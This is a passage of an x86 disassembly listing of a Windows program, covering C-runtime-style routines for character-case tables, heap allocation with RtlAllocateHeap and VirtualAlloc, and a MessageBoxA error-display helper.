ja short loc_403C46
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403C46: ; CODE XREF: sub_403BD6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403C1F
pop edi
pop ebx
loc_403C51: ; CODE XREF: sub_403BD6+42�j
push 0
lea eax, [ebp+var_514]
push dword_4074C4
push dword_407290
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40380C
push 0
lea eax, [ebp+var_214]
push dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_4074C4
call sub_4047EE
push 0
lea eax, [ebp+var_314]
push dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_4074C4
call sub_4047EE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403CCC: ; CODE XREF: sub_403BD6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403CEA
or byte_4073C1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403CE2: ; CODE XREF: sub_403BD6+127�j
mov byte_4072C0[eax], dl
jmp short loc_403D06
; ---------------------------------------------------------------------------
loc_403CEA: ; CODE XREF: sub_403BD6+FC�j
test dl, 2
jz short loc_403CFF
or byte_4073C1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403CE2
; ---------------------------------------------------------------------------
loc_403CFF: ; CODE XREF: sub_403BD6+117�j
and byte_4072C0[eax], 0
loc_403D06: ; CODE XREF: sub_403BD6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403CCC
jmp short loc_403D58
; ---------------------------------------------------------------------------
loc_403D0F: ; CODE XREF: sub_403BD6+1D�j
xor eax, eax
mov esi, 100h
loc_403D16: ; CODE XREF: sub_403BD6+180�j
cmp eax, 41h
jb short loc_403D34
cmp eax, 5Ah
ja short loc_403D34
or byte_4073C1[eax], 10h
mov cl, al
add cl, 20h
loc_403D2C: ; CODE XREF: sub_403BD6+174�j
mov byte_4072C0[eax], cl
jmp short loc_403D53
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403BD6+143�j
; sub_403BD6+148�j
cmp eax, 61h
jb short loc_403D4C
cmp eax, 7Ah
ja short loc_403D4C
or byte_4073C1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403D2C
; ---------------------------------------------------------------------------
loc_403D4C: ; CODE XREF: sub_403BD6+161�j
; sub_403BD6+166�j
and byte_4072C0[eax], 0
loc_403D53: ; CODE XREF: sub_403BD6+15C�j
inc eax
cmp eax, esi
jb short loc_403D16
loc_403D58: ; CODE XREF: sub_403BD6+137�j
pop esi
leave
retn
sub_403BD6 endp
; =============== S U B R O U T I N E =======================================
sub_403D5B proc near ; CODE XREF: sub_402E37+9�p
; sub_402E8F+D�p ...
cmp dword_4075E8, 0
jnz short locret_403D76
push 0FFFFFFFDh
call sub_403997
pop ecx
mov dword_4075E8, 1
locret_403D76: ; CODE XREF: sub_403D5B+7�j
retn
sub_403D5B endp
; =============== S U B R O U T I N E =======================================
sub_403D77 proc near ; CODE XREF: sub_402E8F+9D�p
; sub_403195+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403DA4
push esi
call sub_403E58
pop ecx
test eax, eax
push esi
jz short loc_403D96
push eax
call sub_403E83
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403D96: ; CODE XREF: sub_403D77+13�j
push 0
push dword_4074C8
call dword_405090 ; RtlFreeHeap
loc_403DA4: ; CODE XREF: sub_403D77+7�j
pop esi
retn
sub_403D77 endp
; =============== S U B R O U T I N E =======================================
sub_403DA6 proc near ; CODE XREF: sub_402E8F+3A�p
; sub_402E8F+6F�p ...
arg_0 = dword ptr 4
push dword_407270
push [esp+4+arg_0]
call sub_403DB8
pop ecx
pop ecx
retn
sub_403DA6 endp
; =============== S U B R O U T I N E =======================================
sub_403DB8 proc near ; CODE XREF: sub_403DA6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403DE1
loc_403DBF: ; CODE XREF: sub_403DB8+27�j
push [esp+arg_0]
call sub_403DE4
test eax, eax
pop ecx
jnz short locret_403DE3
cmp [esp+arg_4], eax
jz short locret_403DE3
push [esp+arg_0]
call sub_404A3D
test eax, eax
pop ecx
jnz short loc_403DBF
loc_403DE1: ; CODE XREF: sub_403DB8+5�j
xor eax, eax
locret_403DE3: ; CODE XREF: sub_403DB8+13�j
; sub_403DB8+19�j
retn
sub_403DB8 endp
; =============== S U B R O U T I N E =======================================
sub_403DE4 proc near ; CODE XREF: sub_403DB8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_4070B8
ja short loc_403DFC
push esi
call sub_4041AE
test eax, eax
pop ecx
jnz short loc_403E18
loc_403DFC: ; CODE XREF: sub_403DE4+B�j
test esi, esi
jnz short loc_403E03
push 1
pop esi
loc_403E03: ; CODE XREF: sub_403DE4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_4074C8
call dword_40506C ; RtlAllocateHeap
loc_403E18: ; CODE XREF: sub_403DE4+16�j
pop esi
retn
sub_403DE4 endp
; =============== S U B R O U T I N E =======================================
sub_403E1A proc near ; CODE XREF: sub_403472+20�p
push 140h
push 0
push dword_4074C8
call dword_40506C ; RtlAllocateHeap
test eax, eax
mov dword_40728C, eax
jnz short loc_403E37
retn
; ---------------------------------------------------------------------------
loc_403E37: ; CODE XREF: sub_403E1A+1A�j
and dword_407284, 0
and dword_407288, 0
push 1
mov dword_407280, eax
mov dword_407278, 10h
pop eax
retn
sub_403E1A endp
; =============== S U B R O U T I N E =======================================
sub_403E58 proc near ; CODE XREF: sub_403D77+A�p
arg_0 = dword ptr 4
mov eax, dword_407288
lea ecx, [eax+eax*4]
mov eax, dword_40728C
lea ecx, [eax+ecx*4]
loc_403E68: ; CODE XREF: sub_403E58+26�j
cmp eax, ecx
jnb short loc_403E80
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403E82
add eax, 14h
jmp short loc_403E68
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_403E58+12�j
xor eax, eax
locret_403E82: ; CODE XREF: sub_403E58+21�j
retn
sub_403E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E83 proc near ; CODE XREF: sub_403D77+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403F49
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403EDB
mov [ebp+arg_4], edi
loc_403EDB: ; CODE XREF: sub_403E83+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403F2D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403F09
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403F2D
; ---------------------------------------------------------------------------
loc_403F09: ; CODE XREF: sub_403E83+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403F2D: ; CODE XREF: sub_403E83+60�j
; sub_403E83+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403F49: ; CODE XREF: sub_403E83+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403F57
push 3Fh
pop edi
loc_403F57: ; CODE XREF: sub_403E83+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_404006
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403F82
mov [ebp+arg_4], edx
mov ecx, edx
loc_403F82: ; CODE XREF: sub_403E83+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403F94
mov edi, edx
loc_403F94: ; CODE XREF: sub_403E83+10D�j
cmp ecx, edi
jz short loc_404003
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403FEB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403FC7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403FEB
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403E83+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403FEB: ; CODE XREF: sub_403E83+11E�j
; sub_403E83+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_404003: ; CODE XREF: sub_403E83+113�j
mov edx, [ebp+var_8]
loc_404006: ; CODE XREF: sub_403E83+DD�j
cmp [ebp+var_14], 0
jnz short loc_404015
cmp [ebp+arg_4], edi
jz loc_40409E
loc_404015: ; CODE XREF: sub_403E83+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40409E
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404072
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404061
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404061: ; CODE XREF: sub_403E83+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_40409B
; ---------------------------------------------------------------------------
loc_404072: ; CODE XREF: sub_403E83+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404088
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404088: ; CODE XREF: sub_403E83+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_40409B: ; CODE XREF: sub_403E83+1ED�j
mov ebx, [ebp+var_C]
loc_40409E: ; CODE XREF: sub_403E83+18C�j
; sub_403E83+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4041A9
mov eax, dword_407284
test eax, eax
jz loc_40419B
mov ecx, dword_40727C
mov edi, dword_405094
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; dword_405094
mov ecx, dword_40727C
mov eax, dword_407284
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_407284
mov ecx, dword_40727C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_407284
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_407284
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404129
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_407284
loc_404129: ; CODE XREF: sub_403E83+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_40419B
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; dword_405094
mov eax, dword_407284
push dword ptr [eax+10h]
push 0
push dword_4074C8
call dword_405090 ; RtlFreeHeap
mov eax, dword_407288
mov edx, dword_40728C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_407284
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404A60
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_407288
cmp eax, dword_407284
jbe short loc_40418D
sub eax, 14h
loc_40418D: ; CODE XREF: sub_403E83+305�j
mov ecx, dword_40728C
mov dword_407280, ecx
jmp short loc_40419E
; ---------------------------------------------------------------------------
loc_40419B: ; CODE XREF: sub_403E83+233�j
; sub_403E83+2AA�j
mov eax, [ebp+arg_0]
loc_40419E: ; CODE XREF: sub_403E83+316�j
mov dword_407284, eax
mov dword_40727C, esi
loc_4041A9: ; CODE XREF: sub_403E83+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041AE proc near ; CODE XREF: sub_403DE4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_407288
mov edx, dword_40728C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4041EE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4041FE
; ---------------------------------------------------------------------------
loc_4041EE: ; CODE XREF: sub_4041AE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4041FE: ; CODE XREF: sub_4041AE+3E�j
mov eax, dword_407280
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404225
loc_40420C: ; CODE XREF: sub_4041AE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404225
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40420C
loc_404225: ; CODE XREF: sub_4041AE+5C�j
; sub_4041AE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4042A3
mov ebx, edx
loc_40422C: ; CODE XREF: sub_4041AE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404248
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404246
add ebx, 14h
jmp short loc_40422C
; ---------------------------------------------------------------------------
loc_404246: ; CODE XREF: sub_4041AE+91�j
cmp ebx, eax
loc_404248: ; CODE XREF: sub_4041AE+83�j
jnz short loc_4042A3
loc_40424A: ; CODE XREF: sub_4041AE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404260
cmp dword ptr [ebx+8], 0
jnz short loc_40425D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40424A
; ---------------------------------------------------------------------------
loc_40425D: ; CODE XREF: sub_4041AE+A5�j
cmp ebx, [ebp+var_4]
loc_404260: ; CODE XREF: sub_4041AE+9F�j
jnz short loc_404288
mov ebx, edx
loc_404264: ; CODE XREF: sub_4041AE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404278
cmp dword ptr [ebx+8], 0
jnz short loc_404276
add ebx, 14h
jmp short loc_404264
; ---------------------------------------------------------------------------
loc_404276: ; CODE XREF: sub_4041AE+C1�j
cmp ebx, eax
loc_404278: ; CODE XREF: sub_4041AE+BB�j
jnz short loc_404288
call sub_4044B7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_40429C
loc_404288: ; CODE XREF: sub_4041AE:loc_404260�j
; sub_4041AE:loc_404278�j
push ebx
call sub_404568
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4042A3
loc_40429C: ; CODE XREF: sub_4041AE+D8�j
xor eax, eax
jmp loc_4044B2
; ---------------------------------------------------------------------------
loc_4042A3: ; CODE XREF: sub_4041AE+7A�j
; sub_4041AE:loc_404248�j ...
mov dword_407280, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4042CA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404301
loc_4042CA: ; CODE XREF: sub_4041AE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4042FE
loc_4042E7: ; CODE XREF: sub_4041AE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4042E7
loc_4042FE: ; CODE XREF: sub_4041AE+137�j
mov edx, [ebp+var_4]
loc_404301: ; CODE XREF: sub_4041AE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40432A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40432A: ; CODE XREF: sub_4041AE+16D�j
; sub_4041AE+183�j
test ecx, ecx
jl short loc_404333
shl ecx, 1
inc edi
jmp short loc_40432A
; ---------------------------------------------------------------------------
loc_404333: ; CODE XREF: sub_4041AE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404350
push 3Fh
pop esi
loc_404350: ; CODE XREF: sub_4041AE+19D�j
cmp esi, edi
jz loc_404465
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4043C1
cmp edi, 20h
jge short loc_404390
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_404390: ; CODE XREF: sub_4041AE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_4043BE: ; CODE XREF: sub_4041AE+1D6�j
; sub_4041AE+203�j
mov ebx, [ebp+arg_0]
loc_4043C1: ; CODE XREF: sub_4041AE+1B0�j
; sub_4041AE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404471
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404462
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404433
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404421
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404421: ; CODE XREF: sub_4041AE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404462
; ---------------------------------------------------------------------------
loc_404433: ; CODE XREF: sub_4041AE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40444C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40444C: ; CODE XREF: sub_4041AE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404462: ; CODE XREF: sub_4041AE+24E�j
; sub_4041AE+283�j
mov ecx, [ebp+var_8]
loc_404465: ; CODE XREF: sub_4041AE+1A4�j
test ecx, ecx
jz short loc_404474
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404474
; ---------------------------------------------------------------------------
loc_404471: ; CODE XREF: sub_4041AE+229�j
mov ecx, [ebp+var_8]
loc_404474: ; CODE XREF: sub_4041AE+2B9�j
; sub_4041AE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4044AA
cmp ebx, dword_407284
jnz short loc_4044AA
mov ecx, [ebp+var_4]
cmp ecx, dword_40727C
jnz short loc_4044AA
and dword_407284, 0
loc_4044AA: ; CODE XREF: sub_4041AE+2E0�j
; sub_4041AE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4044B2: ; CODE XREF: sub_4041AE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4041AE endp
; =============== S U B R O U T I N E =======================================
sub_4044B7 proc near ; CODE XREF: sub_4041AE+CC�p
mov eax, dword_407288
mov ecx, dword_407278
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4044FA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_40728C
push edi
push dword_4074C8
call dword_405064 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40454A
add dword_407278, 10h
mov dword_40728C, eax
mov eax, dword_407288
loc_4044FA: ; CODE XREF: sub_4044B7+11�j
mov ecx, dword_40728C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_4074C8
lea esi, [ecx+eax*4]
call dword_40506C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40454A
push 4
push 2000h
push 100000h
push edi
call dword_405068 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40454E
push dword ptr [esi+10h]
push edi
push dword_4074C8
call dword_405090 ; RtlFreeHeap
loc_40454A: ; CODE XREF: sub_4044B7+30�j
; sub_4044B7+67�j
xor eax, eax
jmp short loc_404565
; ---------------------------------------------------------------------------
loc_40454E: ; CODE XREF: sub_4044B7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_407288
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404565: ; CODE XREF: sub_4044B7+95�j
pop edi
pop esi
retn
sub_4044B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404568 proc near ; CODE XREF: sub_4041AE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40457A: ; CODE XREF: sub_404568+19�j
test eax, eax
jl short loc_404583
shl eax, 1
inc ebx
jmp short loc_40457A
; ---------------------------------------------------------------------------
loc_404583: ; CODE XREF: sub_404568+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404598: ; CODE XREF: sub_404568+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404598
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_405068 ; VirtualAlloc
test eax, eax
jnz short loc_4045CB
or eax, 0FFFFFFFFh
jmp loc_40465E
; ---------------------------------------------------------------------------
loc_4045CB: ; CODE XREF: sub_404568+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404611
lea eax, [edi+10h]
loc_4045D8: ; CODE XREF: sub_404568+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4045D8
loc_404611: ; CODE XREF: sub_404568+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40464E
or [eax+4], edi
loc_40464E: ; CODE XREF: sub_404568+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40465E: ; CODE XREF: sub_404568+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404568 endp
; =============== S U B R O U T I N E =======================================
sub_404663 proc near ; CODE XREF: sub_4036B9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_407240, ebx
push esi
push edi
jnz short loc_4046B2
push offset aUser32_dll ; "user32.dll"
call dword_405060 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4046E8
mov esi, dword_4050B0
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_4050B0
test eax, eax
mov dword_407240, eax
jz short loc_4046E8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_4050B0
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_407244, eax
call esi ; dword_4050B0
mov dword_407248, eax
loc_4046B2: ; CODE XREF: sub_404663+B�j
mov eax, dword_407244
test eax, eax
jz short loc_4046D1
call eax ; dword_407244
mov ebx, eax
test ebx, ebx
jz short loc_4046D1
mov eax, dword_407248
test eax, eax
jz short loc_4046D1
push ebx
call eax ; dword_407248
mov ebx, eax
loc_4046D1: ; CODE XREF: sub_404663+56�j
; sub_404663+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_407240 ; MessageBoxA
loc_4046E4: ; CODE XREF: sub_404663+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4046E8: ; CODE XREF: sub_404663+1C�j
; sub_404663+33�j
xor eax, eax
jmp short loc_4046E4
sub_404663 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046F0 proc near ; CODE XREF: sub_4036B9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404773
push esi
push ebx
